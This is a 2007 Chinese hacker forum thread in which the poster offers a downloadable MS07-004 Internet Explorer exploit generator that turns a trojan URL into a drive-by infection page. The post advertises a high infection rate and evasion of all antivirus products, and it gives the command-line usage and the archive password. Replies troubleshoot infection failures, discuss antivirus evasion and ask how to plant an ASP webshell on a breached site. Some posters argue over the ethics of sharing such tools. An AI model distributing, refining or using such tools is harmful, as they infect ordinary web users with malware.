[原创]MS07-004 0Day生成器(Nighter版)
软件作者:seraph.x信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
[b]注意:本软件首发[url=http://blog.nighter.net/]Seraph's Blog[/url],后由原创作者友情提交到邪恶八进制信息安全团队讨论组。转载请注明原始出处[url=http://blog.nighter.net/][u]Seraph's Blog[/u][/url]。[/b]
看幻影的刺已经出了MS07-004的分析报告,但是Exploit写的很粗糙,根本不适合直接用作网页木马,于是就写了这个MS07-004 0Day生成器,现在共享给大家,中马率特高,2000、XP、2003都测试通过,只要没打最新补丁的全过!过如今所有杀毒软件!
昨天我找[url]www.feelids.com[/url]的慕容小雨要他们写的Exploit,他马上发给我一个exe文件,我打开一看是个动画演示,演示使用07004生成的网马肉鸡能否上线,然后我让他把Exploit发给我看下,他竟然说不给,要卖1万,无语了。
使用方法:CMD下运行MS07-004
[url]http://www.target.com/[/url]***.exe(木马地址) ***.htm(生成后的文件)
[attach]9915[/attach]
解压密码:[b]vip.nighter.net[/b]
不要拿了东西就走人哦,有什么好东西要懂得跟大家分享。
技术交流群:839310 XP,2003下成功,但2000下好像不行 这个整数溢出好象有限制,楼主说的成功率指的是在什么系统上。。。而且看你生成的html文件来看,跟网上发布的似乎并没有什么不同。而且shellcode看了下好象并没有堆栈平衡的处理,估计挂IE是肯定的了。不知道偶说的对不对 milw0rm.com上发过MS Internet Explorer VML Download and Execute Exploit
perl写的,生成器。 确实没有堆栈平衡的处理,所以挂IE.... [s:39] 我看生成后的html代码和望上发布的没什么两样,我用我自己编译的生成器也生成一样的html文件,而且我发现我编译的程序只有19.1k,而楼主的程序却有40k,用peid扫下”Microsoft Visual C++ 6.0“,奇怪,大家小心~ 是伪装壳吗?还是没加壳? 之前我也在网上看到一个,自己菜还不知道怎么改 [s:39] 小雨的那个不卡IE的~ [s:39] 好东东
特地赶来灌一水 IE全部掉线 而且EXE文件未执行
测试系统 XP SP2 [quote][b]引用第8楼[i]dayang1718[/i]于[i]2007-01-23 18:20[/i]发表的[/b]:
我看生成后的html代码和望上发布的没什么两样,我用我自己编译的生成器也生成一样的html文件,而且我发现我编译的程序只有19.1k,而楼主的程序却有40k,用peid扫下”Microsoft Visual C++ 6.0“,奇怪,大家小心~[/quote]
有些话在说的时候还是考虑清楚,没有根据不要乱说.虽然我没有去仔细看楼主的程序,但是单从你说的这点根据还是不成立的.VC编译出的debug版本大小40K还是很正常的.peid应该也能侦测出是release还是debug的,我手头上没有peid所以没法验证了。 小雨的那个不卡
命中率高
shellcode不一样的撒. XP SP2测试成功
晕,出现报错,进程报错,怎么修改?
难道是人品问题? 让别人为了利益拿去挂马,这种生成器已经不是钻研技术范畴的东西了。 楼上的最不厚道,放不放关你什么事?
另外楼主的这个被AVG和卡巴杀。 测试不行 XP SP2 我把我自己写的EXE上传到空间 比如 [url]http://www.host.com/xxx.exe[/url] 然后在本地ms07-004.exe [url]http://www.host.com/xxx.exe[/url] ent.html 得到ENT.HTML 把ENT.HTML传到服务器上 然后通过本地访问 我写的EXE跟本没有执行.... 关于类似漏洞的堆栈恢复问题,还是相当值得研究一下,楼主的或是大牛门给点恢复的思路吧 测试不上线 系统 xp sp2 另外,我想问一句就是c语言的代码,使用什么工具编译成exe的比较好,出错少!~ 加壳了没啊.是伪装壳吗? 网马之家有图形版的生成器:
[url]http://www.hackwm.com/[/url] [IMG]http://www.hackwm.com/download/wm07004.gif[/IMG] 删了我的回复我也不生气。但想要工具的,哪个不是想去挂马的?我是为eviloctal原先挺好的一个技术氛围惋惜。
你们测试不成功很正常,溢出部分,每次覆盖的不一定是同一种对象的pvftable 最终的触发也不都是call [ecx+10],当然差不多落在大段heap里面也就可以,可是ie插件那么多,鬼知道你javascript 申请的内存在什么地方。 不厚道,改天发一个偶改的.这样从milw0rm.com拉一个就变自己的.
你先能平衡了堆栈再拿出来悬. 路过过路……继续
难道都是用来挂马的吗?你搞黑的用到正就叫红,给国家干事(好象无比光荣)
搞歪的就叫黑,你丫就是黑客了
网马也一样如此滴!!东西本无错 [quote][b]引用第25楼[i]swap[/i]于[i]2007-01-25 14:29[/i]发表的[/b]:
路过过路……继续
难道都是用来挂马的吗?你搞黑的用到正就叫红,给国家干事(好象无比光荣)
搞歪的就叫黑,你丫就是黑客了
网马也一样如此滴!!东西本无错[/quote]
这位你就扯远了。钻研这行,别什么正反的,最好低调,到头来出国还要被国安拦住可不好。
为个工具乐颠乐颠的,我就弄1000台机器让你控制去,到头来有什么意思阿。
搞个工具,网马满天飞,给用户装流氓软件,害苦的是的网民,破坏的是互联网产业。当然这不是工具的错,这个深究下去就三言两语说不完了,咱不管这个。但就eviloctal来讲,本应是个讨论技术的地方,写exploit要涉及很多系统知识,称之为技术不过分。里面的钻研和挑战才是乐趣的所在。我是为这里的气氛惋惜。 [quote][b]引用第26楼[i]realone[/i]于[i]2007-01-25 16:41[/i]发表的[/b]:
这位你就扯远了。钻研这行,别什么正反的,最好低调,到头来出国还要被国安拦住可不好。
为个工具乐颠乐颠的,我就弄1000台机器让你控制去,到头来有什么意思阿。
搞个工具,网马满天飞,给用户装流氓软件,害苦的是的网民,破坏的是互联网产业。当然这不是工具的错,这个深究下去就三言两语说不完了,咱不管这个。但就eviloctal来讲,本应是个讨论技术的地方,写exploit要涉及很多系统知识,称之为技术不过分。里面的钻研和挑战才是乐趣的所在。我是为这里的气氛惋惜。[/quote]
我真的感觉你这个人很不厚道,气氛是发个什么什么工具就会产生影响的吗?
再说 我们这里面的人在 你眼力 过来看这个都是为了谋取什么利益吗?再说了 这些东西我们邪八不发
其他的论坛也会发..
本身论坛是比较自由交流的一个场所,不能让让人为了你的想法,为了你心中所谓的那种氛围,去做事,说话吧..很多东西不是因为一个人的想法来要求别人,你定的规则是你自己的规则,你可以用来约束你自己,..
个人感觉你说的话 是有点过分了咯...
不知道自己该说什么了...说的有得罪之处 ..还望见谅... 看你的BLOG上你不是也写了个栈平衡的么,发出来给大家分享下!? [s:34] [quote][b]引用第23楼[i]realone[/i]于[i]2007-01-24 21:43[/i]发表的[/b]:
删了我的回复我也不生气。但想要工具的,哪个不是想去挂马的?我是为eviloctal原先挺好的一个技术氛围惋惜。
你们测试不成功很正常,溢出部分,每次覆盖的不一定是同一种对象的pvftable 最终的触发也不都是call [ecx+10],当然差不多落在大段heap里面也就可以,可是ie插件那么多,鬼知道你javascript 申请的内存在什么地方。[/quote]
这位仁兄说的是,不过这跟氛围确实有点扯不上关系吧?你说菜刀可以被人拿来用在切菜垛肉,也可以成为犯罪分子的凶器,那么难道说不让卖菜刀了吗?可是目前看来,好像菜刀是照样卖,因为他方便的是大多数人,毕竟拿菜刀去杀人的人还是少数。
所以氛围跟发不发不工具没什么太大的关系,网络安全本来就是把双刃剑,不能因为有人拿工具去挂马,拿代码去卖,我们就不共享了。道理相信大家都明白,我明明给你的是把水果刀让你削水果用,而你却偏要拿去捅人,这总不能愿我吧?更何况,网络之中大家都互不相识,每个人在发布东西的时候都不可能都知道下载的人会去拿它干什么,但是只要相信,拿去研究的毕竟占大多数,真正为了挂马黑站的还是少数啊。
不过,朋友你的担心也不无道理。现在安全圈子里到处都冲满了铜臭味,真正的技术共享正在淡出这个圈子。我也不知道这是好是坏,也许正是因为商业化加入,会促进国内黑客技术的发展。但让人担忧的是,虽然国内自称黑客的孩子越来越多,但是他们其中很多人的目的不是为了技术,也不是为了以后靠黑客技术光明正大的混口饭吃,而是为了眼前的某些暴利。。。这样的目的很可怕,使得黑客真正的形象在国内变得扭曲变形。。。。
不过连国内所谓最顶尖的组织都会让自己牵扯进“娱乐”的丑闻陷阱,我看我们真应该为黑客精神烧烧香了! 各位消消气。扯远了!大家只是各自看法不同而已!都是学习的!看了发表下意见!有不同意见的直接说,但没必要吵 D,一句话,有不同意见就把自己的弄出来,比别人好,你就有资格批评别人!如果你自己都弄不出来!就别妄自菲薄! 是不是该考虑免杀的问题了?跟踪特征码,改大小写还不行,郁闷
难道要重写SHELLCODE? XP SP2 下测试 IE 卡掉 xp2好像没啥反应啊??????? [quote][b]引用第10楼[i]xi5566[/i]于[i]2007-01-23 21:25[/i]发表的[/b]:
IE全部掉线 而且EXE文件未执行
测试系统 XP SP2[/quote]
一样。请教楼主。。。 2000+sp4测试了,巨卡,IE直接挂掉,程序未运行。
现在真不知道挂马有什么意思,鸡多了好玩吗? 有个问题啊?拿到后台管理员帐号和密码都进去了,就是不给上传asp木马只能传gif,jpg格式请问怎么办?? 谁有小雨版网马啊。。有的话这里共享一下哈`。。谢谢各位了` 2003sp1 测试,卡死 效果不好啊。。有的不能上线 [quote][b]引用第16楼[i]fenglin88[/i]于[i]2007-01-24 15:04[/i]发表的[/b]:
测试不行 XP SP2 我把我自己写的EXE上传到空间 比如 [url]http://www.host.com/xxx.exe[/url] 然后在本地ms07-004.exe [url]http://www.host.com/xxx.exe[/url] ent.html 得到ENT.HTML 把ENT.HTML传到服务器上 然后通过本地访问 我写的EXE跟本没有执行....[/quote]
同样问题哈。。
难道真的RPWT了? [s:39] 敢问楼上的怎么成功了啊
我在2k下测试 IE卡死 exe也没执行
在xp sp2测试 IE干脆出错 说遇到问题。。。
不成功啊
换了个sp1的 页面是红色一片
什么都没有 exe也没被执行
看来还是有问题。兼容不好
谁有一个兼容好的 给小弟一个吧
谢谢了 windows xp测试不成功 ie6.0 sp2 我在学校的WIN2000测试 IE也卡死了. 效果不怎么好 ` 就算配合了溢出延时我想也很容易用发现!~
win xpsp2下直接挂IE
win 2K 暴卡有时也挂IE
win 3K 同上!`
顺带日日那刺客的网马` 基本就是06014还带个后门!` 纳闷一下!` 访问的时候,切换到其他页面,马上把木马页面关闭,可能会好些,没试过,只是思路! 请问一下这个shellcode对英语 韩语 日语的系统是否有用?我以前看过一些exploit的资料说不同语言的操作系统的jmp esp地址不一样 我只是想学习下,所以问个很弱智的问题,在原来幻影的论坛上刺发的文章里讲了这个溢出的原理,里面说这个溢出点用OD直接跟程序流程就能找到,我照着跟了,可是如果是用OD跟IE的话只能看到0040xxxx地址段啊,但是文中讲到的溢出点在6FF176xx那里,我就不明白了,在IE的整个流程里就没有跳到6FF176xx的跳转,也没办法设置那里的断点,那他是怎么跟到那里的,问题比较弱智,但是困饶我很长时间了,请指教一下,谢谢!!!! 没有处理堆栈平衡
到头还是挂掉IE 不过cookies加载一天一次 还可以理解..... 经测试(多台电脑) 1G以上内存可以中(还是有点卡),516的RAM大部分挂IE
页:
[1]
2